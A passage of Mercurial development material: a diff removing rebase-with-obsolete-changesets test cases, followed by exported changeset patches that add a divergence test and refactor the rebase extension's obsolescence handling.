o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. - - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. - - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - note: not rebasing 2:a82ac2b38757 c "c", it has no successor - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ cd .. - -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [10] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. - - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - Test that bookmark is moved and working dir is updated when all changesets have equivalents in destination $ hg init rbsrepo && cd rbsrepo # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616519578 25200 # Tue Mar 23 10:12:58 2021 -0700 # Node ID 6648307d4fe84a48eb4603d61f1274bc093979bf # Parent 13b200ffe8eb08ca6c3aa1e2076f0971fef30c12 tests: test divergence created during interrupted rebase If a rebase runs into conflicts and the user somehow rewrites an unrebased commit in the rebase set while the rebase is interrupted, continuing it might result in divergence. It turns out that we decide to skip the commit. That seems to make sense, but it wasn't obvious to me that that's what we should do. Either way, this patch adds a test case for the current behavior. Differential Revision: https://phab.mercurial-scm.org/D10256 diff --git a/tests/test-rebase-obsolete3.t b/tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete3.t +++ b/tests/test-rebase-obsolete3.t @@ -282,6 +282,49 @@ $ cd .. +Start a normal rebase. When it runs into conflicts, rewrite one of the +commits in the rebase set, causing divergence when the rebase continues. + + $ hg init $TESTTMP/new-divergence-after-conflict + $ cd $TESTTMP/new-divergence-after-conflict + $ hg debugdrawdag <<'EOS' + > C2 + > | C1 + > |/ + > B # B/D=B + > | D + > |/ + > A + > EOS + $ hg rebase -r B::C1 -d D + rebasing 1:2ec65233581b B "B" + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') + [240] + $ hg debugobsolete $(hg log -r C1 -T '{node}') $(hg log -r C2 -T '{node}') + 1 new obsolescence markers + obsoleted 1 changesets + $ hg log -G + o 4:fdb9df6b130c C2 + | + | x 3:7e5bfd3c08f0 C1 (rewritten as 4:fdb9df6b130c) + |/ + | @ 2:b18e25de2cf5 D + | | + % | 1:2ec65233581b B + |/ + o 0:426bada5c675 A + + $ echo resolved > D + $ hg resolve -m D + (no more unresolved files) + continue: hg rebase --continue + $ hg rebase -c + rebasing 1:2ec65233581b B "B" + note: not rebasing 3:7e5bfd3c08f0 C1 "C1" and its descendants as this would cause divergence + 1 new orphan changesets + Rebase merge where successor of one parent is equal to destination (issue5198) $ hg init p1-succ-is-dest # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613175573 28800 # Fri Feb 12 16:19:33 2021 -0800 # Node ID 7d80622fc21276aa17b0cc958c3d2494eb6ddf0e # Parent 6648307d4fe84a48eb4603d61f1274bc093979bf rebase: let _handleskippingobsolete(self) read directly from self The function already has `self` as an argument, so there's no need to pass data from `self` into it. Differential Revision: https://phab.mercurial-scm.org/D10246 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -348,20 +348,16 @@ return data - def _handleskippingobsolete(self, obsoleterevs, destmap): - """Compute structures necessary for skipping obsolete revisions - - obsoleterevs: iterable of all obsolete revisions in rebaseset - destmap: {srcrev: destrev} destination revisions - """ + def _handleskippingobsolete(self): + """Compute structures necessary for skipping obsolete revisions""" self.obsoletenotrebased = {} if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return - obsoleteset = set(obsoleterevs) + obsoleteset = {r for r in self.state if self.repo[r].obsolete()} ( self.obsoletenotrebased, self.obsoletewithoutsuccessorindestination, - ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap) + ) = _computeobsoletenotrebased(self.repo, obsoleteset, self.destmap) skippedset = set(self.obsoletenotrebased) skippedset.update(self.obsoletewithoutsuccessorindestination) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) @@ -472,8 +468,7 @@ ) # Calculate self.obsoletenotrebased - obsrevs = {r for r in self.state if self.repo[r].obsolete()} - self._handleskippingobsolete(obsrevs, self.destmap) + self._handleskippingobsolete() # Keep track of the active bookmarks in order to reset them later self.activebookmark = self.activebookmark or repo._activebookmark # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613174702 28800 # Fri Feb 12 16:05:02 2021 -0800 # Node ID d95edcbe5c99e8f489022f7627f27304c06c90b3 # Parent 7d80622fc21276aa17b0cc958c3d2494eb6ddf0e rebase: calculate obsolescense-related info earlier My goal is to use `rewriteutil.precheck()` in the rebase code. Since rebase does its own handling of divergent commits (it skips them instead of erroring out), we need to have divergence-causing commits filtered out early. This patch helps prepare for that. Differential Revision: https://phab.mercurial-scm.org/D10247 diff --git a/hgext/rebase.py b/hgext/rebase.py 